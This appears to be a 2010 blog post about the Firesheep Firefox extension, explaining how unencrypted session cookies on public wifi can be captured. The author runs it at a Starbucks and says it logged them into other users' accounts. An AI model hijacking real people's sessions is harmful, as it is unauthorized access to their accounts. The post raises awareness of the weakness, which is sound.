Recently a developer released an extension for Firefox called Firesheep. It was released to demonstrate the poor security model on many popular websites, and how a user’s information could be “sidejacked” while on a public wifi access point. Basically a website encrypts only the initial login, but does not protect the session’s cookie after that. Someone on the same network, using Firesheep, can intercept that session cookie and allow them to do anything the user can do on a particular website. On an open wifi hotspot the cookies are basically shouted through the air, making these attacks extremely easy.

Currently, Firesheep is available on PC and Mac (Linux is coming soon), and requires Firefox version 3.6.12 or newer. Firefox 4 beta is not supported.

While at my local Starbucks, I fired up Firefox and Firesheep on my Mac to see what it would do while I surf the web.

Screen shot 2010-11-08 at 7.00.36 AM.png

If I double click on any of the entries, I’m quickly logged into the service as that user. Easy enough.

Hopefully the various web sites affected by this will take notice and implement safeguards to prevent their users from falling victim to this type of attack.